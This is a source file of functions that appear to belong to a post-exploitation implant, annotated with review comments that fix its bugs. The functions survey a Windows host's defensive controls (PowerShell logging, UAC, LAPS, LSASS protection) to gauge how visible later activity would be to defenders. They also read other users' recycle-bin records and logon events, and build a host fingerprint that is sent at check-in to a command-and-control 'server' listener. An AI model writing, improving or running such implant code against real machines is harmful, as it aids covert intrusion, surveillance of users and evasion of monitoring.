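def systemInfo():
    """Return the formatted SYSTEM INFORMATION section for this host.

    Collects host/OS/user facts from the .NET ``Environment`` class and the
    state of several defensive controls from well-known HKLM policy keys:
    PowerShell script-block/module logging and transcription, UAC settings,
    legacy LAPS (AdmPwd), LSA protection (RunAsPPL) and the RDP deny flag.
    Reading these HKLM values needs no elevation.  Every lookup falls back to
    a placeholder (``"N/A"`` or a "Likely ..." hint) when the key or value is
    absent, so the report never fails on a hardened or minimal host.

    Returns:
        str: the section produced by ``printHeader`` plus one
        ``label: value`` line per item.
    """
    verInfo = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
    psKey = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine"
    sysPolKey = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
    # Raw strings throughout: the original mixed raw and plain literals, and a
    # plain "\..." registry path only works while no segment starts with a
    # recognised escape (\t, \n, ...); Python 3.12+ also warns on such literals.
    psPolicy = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell"
    lapsKey = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft Services\AdmPwd"
    lsaKey = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
    tsKey = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

    def regBool(key, name):
        # Registry.GetValue hands back the default when the key or value is
        # missing; the original passed "N/A" as that default and then fed it
        # to Convert.ToBoolean, which raises FormatException on the string.
        # Only convert a value that actually exists.
        value = Registry.GetValue(key, name, None)
        return "N/A" if value is None else Convert.ToBoolean(value)

    kernelVer = Diagnostics.FileVersionInfo.GetVersionInfo(
        Env.SystemDirectory + "\\kernel32.dll").ProductVersion
    # Environment.TickCount is a 32-bit millisecond counter that wraps after
    # ~24.9 days, so the derived boot time is only reliable below that uptime.
    bootTime = DateTimeOffset(DateTime.Now).AddMilliseconds(-Env.TickCount).LocalDateTime
    # IsInRole(Administrator) is evaluated against the current token: under
    # UAC an administrator in a non-elevated (filtered) process reports False
    # in practice, which is why the line is labelled "High Integrity".
    highIntegrity = WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(
        WindowsBuiltInRole.Administrator)

    sysSummary = printHeader("SYSTEM INFORMATION")
    sysSummary += "{0:<10}: {1}\n".format("Host", Env.MachineName)
    sysSummary += "{0:<10}: {1} {2}\n".format(
        "OS", Registry.GetValue(verInfo, "ProductName", "Windows"), kernelVer)
    sysSummary += "{0:<10}: {1}\n".format("64-Bit", Env.Is64BitOperatingSystem)
    sysSummary += "{0:<10}: {1}\n".format("Date", DateTime.Now.ToString())
    sysSummary += "{0:<10}: {1}\n\n".format("Uptime", bootTime)
    # "\\{" is the literal backslash the original spelled as the invalid escape "\{".
    sysSummary += "{0:<14}: {1}\\{2}\n".format("Username", Env.UserDomainName, Env.UserName)
    sysSummary += "{0:<14}: {1}\n\n".format("Logon Server", Env.GetEnvironmentVariable("LOGONSERVER"))
    sysSummary += "{0:<22}: {1}\n".format(
        "PowerShell Version", Registry.GetValue(psKey, "PowerShellVersion", "N/A - Likely 2.0"))
    sysSummary += "{0:<22}: {1}\n".format(
        "PowerShell Compat", Registry.GetValue(psKey, "PSCompatibleVersion", "N/A - Likely 1.0, 2.0"))
    # The next four lines report whether the host records PowerShell activity,
    # i.e. how visible later PowerShell use would be to defenders.
    sysSummary += "{0:<22}: {1}\n".format(
        "PS Script Block Log",
        Registry.GetValue(psPolicy + r"\ScriptBlockLogging", "EnableScriptBlockLogging", "N/A"))
    sysSummary += "{0:<22}: {1}\n".format(
        "PS Transcription",
        Registry.GetValue(psPolicy + r"\Transcription", "EnableTranscripting", "N/A"))
    sysSummary += "{0:<22}: {1}\n".format(
        "PS Transcription Dir",
        Registry.GetValue(psPolicy + r"\Transcription", "OutputDirectory", "N/A"))
    sysSummary += "{0:<22}: {1}\n\n".format(
        "PS Module Logging",
        Registry.GetValue(psPolicy + r"\ModuleLogging", "EnableModuleLogging", "N/A"))
    sysSummary += "{0:<27}: {1}\n".format("UAC Enabled", regBool(sysPolKey, "EnableLUA"))
    sysSummary += "{0:<27}: {1}\n".format("High Integrity", highIntegrity)
    # The documented value is LocalAccountTokenFilterPolicy (1 = local admins
    # get an unfiltered token over the network); the original queried
    # "LocalAccount", which does not exist and so always reported False.
    sysSummary += "{0:<27}: {1}\n".format(
        "UAC Token Filter Disabled",
        Registry.GetValue(sysPolKey, "LocalAccountTokenFilterPolicy", False))
    sysSummary += "{0:<27}: {1}\n".format(
        "UAC Admin Filter Enabled",
        Registry.GetValue(sysPolKey, "FilterAdministratorToken", False))
    # Only the legacy LAPS (AdmPwd) policy key is checked; a newer Windows
    # LAPS deployment configured elsewhere is not detected here.
    sysSummary += "{0:<27}: {1}\n".format(
        "Local Admin Pass Solution", Registry.GetValue(lapsKey, "AdmPwdEnabled", "N/A"))
    sysSummary += "{0:<27}: {1}\n".format(
        "LSASS Protection", Registry.GetValue(lsaKey, "RunAsPPL", "N/A"))
    sysSummary += "{0:<27}: {1}\n".format(
        "Deny RDP Connections", regBool(tsKey, "FDenyTSConnections"))
    return sysSummary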
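def recycleBin():
    """Return a RECYCLE BIN section listing deleted-file records on every drive.

    Each ``$Recycle.Bin\\<SID>`` folder holds a ``$I<id>`` metadata record per
    deleted file next to the ``$R<id>`` file that carries the content; the
    report prints the ``$R`` name and the path text pulled from the ``$I``
    record.  An elevated token walks every SID folder; otherwise only the
    caller's own folder is expected to be readable, so only that one is
    listed.  Unreadable or non-ready drives raise IOError and are skipped
    silently (best effort, as in the original); anything not surfaced as
    IOError still propagates.

    Returns:
        str
    """
    summary = printHeader("RECYCLE BIN")
    isAdmin = WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(
        WindowsBuiltInRole.Administrator)
    for drive in DriveInfo.GetDrives():
        binRoot = drive.Name + "$Recycle.Bin\\"
        try:
            if isAdmin:
                for sidDir in DirectoryInfo(binRoot).EnumerateDirectories():
                    records = [entry.FullName for entry in sidDir.GetFiles()]
                    summary += printSubheader("Directory: {0}".format(sidDir.FullName))
                    summary += _recycleRecords(records)
            else:
                # The token's Owner SID names the per-user folder; for an
                # unelevated token this is typically the user's own SID.
                sidDir = binRoot + WindowsIdentity.GetCurrent().Owner.ToString()
                records = Directory.GetFiles(sidDir)
                summary += printSubheader("Directory: {0}".format(sidDir))
                summary += _recycleRecords(records)
        except IOError:
            # Best effort: CD/removable drives that are not ready, or a bin
            # the caller cannot read, simply produce no section.
            pass
    return summary


def _recycleRecords(paths):
    """Render one ``<$R name>\\t<path text>`` line per ``$I`` record in *paths*.

    The record is binary, so it is opened in binary mode and closed promptly
    (the original read it in text mode via ``open(...).read()`` and never
    closed the handle).  The ``[26::2]`` stride is kept from the original: it
    takes every other byte of the UTF-16LE path stored after the record
    header, i.e. a crude ASCII approximation, and under IronPython 2 it is a
    plain ``str`` exactly as before (on Python 3 it would render as a bytes
    repr).
    NOTE(review): decoding the path field as UTF-16LE would be exact.
    """
    lines = []
    for path in paths:
        name = path.split("\\")[-1]
        if not name.startswith("$I"):
            continue
        with open(path, "rb") as record:
            info = record.read()
        lines.append("{0}\t{1}\n".format(name.replace("$I", "$R"), info[26::2]))
    return "".join(lines)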
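def logonEvents():
    """Return a LOGON EVENTS section with the first ten 4624 entries found.

    Event ID 4624 is a successful account logon in the Security log.  That
    log is not readable by standard users, so the function checks
    IsInRole(Administrator) first and returns a short notice otherwise
    (other identities the log ACL may admit, e.g. Event Log Readers, are
    not considered).

    NOTE(review): entries are taken in log order, i.e. the ten OLDEST
    matching events, not the most recent - confirm that is the intent.

    Returns:
        str
    """
    summary = printHeader("LOGON EVENTS")
    isAdmin = WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(
        WindowsBuiltInRole.Administrator)
    if not isAdmin:
        return summary + "\nNot administrator!\n"
    sec = EventLog("Security")
    try:
        logons = []
        # Stop as soon as ten matches are in hand instead of filtering the
        # whole (often very large) Security log and slicing afterwards; the
        # selected entries are identical.
        for entry in sec.Entries:
            if entry.InstanceId == 4624:
                logons.append(entry)
                if len(logons) == 10:
                    break
        for logon in logons:
            message = logon.Message
            # Trim the boilerplate explanation Windows appends to the 4624
            # message.  IndexOf returns -1 when the marker is absent
            # (localised or changed templates); the original passed -1 to
            # Remove(), which throws ArgumentOutOfRangeException.
            idx = message.IndexOf("This event is generated")
            if idx >= 0:
                message = message.Remove(idx)
            summary += printSubheader("Time Created: {0}".format(logon.TimeGenerated.ToString()))
            summary += message
    finally:
        # EventLog wraps an unmanaged log handle; release it deterministically
        # rather than waiting for finalisation.
        sec.Close()
    return summary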
def is_high_integrity(self):
    """Report whether the current process token is in the Administrators role.

    ``WindowsPrincipal.IsInRole`` is evaluated against the current token, so
    under UAC an administrator running non-elevated (filtered token) gets
    False in practice - hence "high integrity" rather than "is admin".
    ``self`` is unused; the check is process-wide.

    Returns:
        bool
    """
    current = WindowsPrincipal(WindowsIdentity.GetCurrent())
    return current.IsInRole(WindowsBuiltInRole.Administrator)
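def get_sysinfo(nonce='00000000'):
    """Build the pipe-delimited host fingerprint record sent at check-in.

    Field order (13 fields; the original header comment listed ``os_details``
    twice):
        nonce | listener | domainname | username | hostname | internal_ip |
        os_details | high_integrity | process_name | process_id | language |
        language_version | architecture

    NOTE: requires the module-level global ``server`` (the listener), which is
    emitted verbatim as field 2; ``domainname`` is always sent empty.  Every
    probe is best-effort: one that raises is reported as ``[FAILED QUERY]``
    instead of aborting check-in.  Fields are not escaped, so a value holding
    ``|`` or a newline would shift field boundaries for the receiver.

    Args:
        nonce: opaque string echoed back unchanged as the first field.

    Returns:
        str: the record described above.
    """
    __FAILED_FUNCTION = '[FAILED QUERY]'
    isIronPython = platform.python_implementation() == 'IronPython'

    def probe(fn):
        # Run one fingerprint source; any failure maps to the sentinel so a
        # single bad probe cannot take the whole record down.
        try:
            return fn()
        except Exception:
            return __FAILED_FUNCTION

    if isIronPython:
        username = probe(lambda: Environment.UserName)
        # SID of the token user (not emitted; the original called a
        # non-existent ToByteArray() here and always got the sentinel).
        uid = probe(lambda: WindowsIdentity.GetCurrent().User.Value)
        highIntegrity = probe(lambda: WindowsPrincipal(
            WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
        hostname = probe(lambda: Environment.MachineName)
        # OperatingSystem has no ToByteArray() (the original always reported
        # the sentinel here); ToString() gives the OS version string.
        osDetails = probe(lambda: Environment.OSVersion.ToString())
        processID = probe(lambda: Process.GetCurrentProcess().Id)
        # ProcessName, not the Process object (which the original interpolated
        # and which renders as "System.Diagnostics.Process (name)").
        processName = probe(lambda: Process.GetCurrentProcess().ProcessName)
        language = 'ironpython'
    else:
        username = probe(lambda: pwd.getpwuid(os.getuid())[0].strip("\\"))
        # os.getuid() directly instead of shelling out to `id -u`; kept as a
        # string for the "0" comparison below.
        uid = probe(lambda: str(os.getuid()))
        highIntegrity = uid == "0"  # root is treated as high integrity on POSIX
        uname = probe(_uname_fields)
        if uname == __FAILED_FUNCTION:
            # The original indexed the sentinel string here (hostname "F").
            hostname = osDetails = __FAILED_FUNCTION
        else:
            hostname = uname[1]
            osDetails = ",".join(uname)
        processID = probe(os.getpid)
        processName = _posix_process_name()
        language = 'python'

    try:
        internalIP = socket.gethostbyname(socket.gethostname())
    except Exception:
        # Fallback for hosts whose name does not resolve: IPv4 addresses from
        # ifconfig (Linux/BSD only).  strip() so popen's trailing newline can
        # no longer break the record; with several interfaces the value can
        # still contain embedded newlines.
        try:
            internalIP = os.popen(
                "ifconfig|grep inet|grep inet6 -v|grep -v 127.0.0.1|cut -d' ' -f2"
            ).read().strip()
        except Exception:
            internalIP = __FAILED_FUNCTION

    pyVersion = probe(lambda: "%s.%s" % (sys.version_info[0], sys.version_info[1]))
    architecture = probe(platform.machine)

    return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (
        nonce, server, '', username, hostname, internalIP, osDetails,
        highIntegrity, processName, processID, language, pyVersion, architecture)


def _uname_fields():
    """Return (sysname, nodename, release, version, machine) for this host.

    ``os.uname()`` is POSIX-only; ``platform.uname()`` is portable and its
    first five fields are the same, so CPython on Windows gets a real value
    instead of the sentinel.
    """
    if hasattr(os, "uname"):
        return tuple(os.uname())
    return tuple(platform.uname())[:5]


def _posix_process_name():
    """Return the command of the current process as printed by ``ps <pid>``.

    ``ps`` prints a header row and one process row (PID TTY STAT TIME CMD...);
    the command is everything from the fifth column on.  Falls back to
    ``'python'`` when ps is missing or prints nothing usable.  The argument
    list replaces the original ``shell=True`` command string: no shell hop is
    needed for a fixed binary plus an integer pid.
    """
    try:
        ps = subprocess.Popen(['ps', str(os.getpid())],
                              stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, _ = ps.communicate()
    except OSError:
        return 'python'
    rows = out.split(b"\n")
    if len(rows) > 2:
        return b" ".join(rows[1].split()[4:]).decode('UTF-8')
    return 'python'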
def IsHighIntegrity():
    """Return True when the current process token is in the Administrators role.

    The check is made against the current token rather than group
    membership in general: under UAC an administrator whose process is not
    elevated (filtered token) gets False in practice, which is what "high
    integrity" is meant to capture.

    Returns:
        bool
    """
    return WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(
        WindowsBuiltInRole.Administrator)